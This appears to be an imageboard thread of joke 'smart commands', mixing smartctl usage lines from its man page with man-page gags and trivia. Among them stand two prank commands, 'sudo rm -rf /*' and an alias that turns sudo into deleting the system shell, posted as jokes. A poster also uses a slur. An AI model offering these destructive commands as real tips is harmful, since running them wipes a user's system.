>man man
ITT : post some smart commands
>smartctl
whatis man
echo "holy shit. TWO man pages"
man 7 man
poweroff
man whoami
smartctl -a /dev/sda
Print a large amount of SMART information for drive /dev/sda .
smartctl -s off /dev/sdd
Disable SMART monitoring and data log collection on drive /dev/sdd .
smartctl --smart=on --offlineauto=on --saveauto=on /dev/sda
Enable SMART on drive /dev/sda, enable automatic offline testing every four hours, and enable autosaving of SMART
Attributes. This is a good start-up line for your system´s init files. You can issue this command on a running system.
smartctl -t long /dev/sdc
Begin an extended self-test of drive /dev/sdc. You can issue this command on a running system. The results can be seen
in the self-test log visible with the ´-l selftest´ option after it has completed.
smartctl -q errorsonly -H -l selftest /dev/sda
Produces output only if the device returns failing SMART status, or if some of the logged self-tests ended with errors.
sudo rm -rf /*
cal 9 1752
alias sudo='sudo rm /bin/bash#'
:O XD
touch kids
POKE 59458,62
info coreutils
NO MONSTERS ALLOWED
>he doesn't have three
>whatis love
>baby don't hurt me
>don't hurt me no more
That band is great
sudo apt-get install update
cd..
vrms
I just noticed i have a monthly cron job telling me how proprietary my system is.
>-r
>/*
Pick one
Nevermind I'm retarded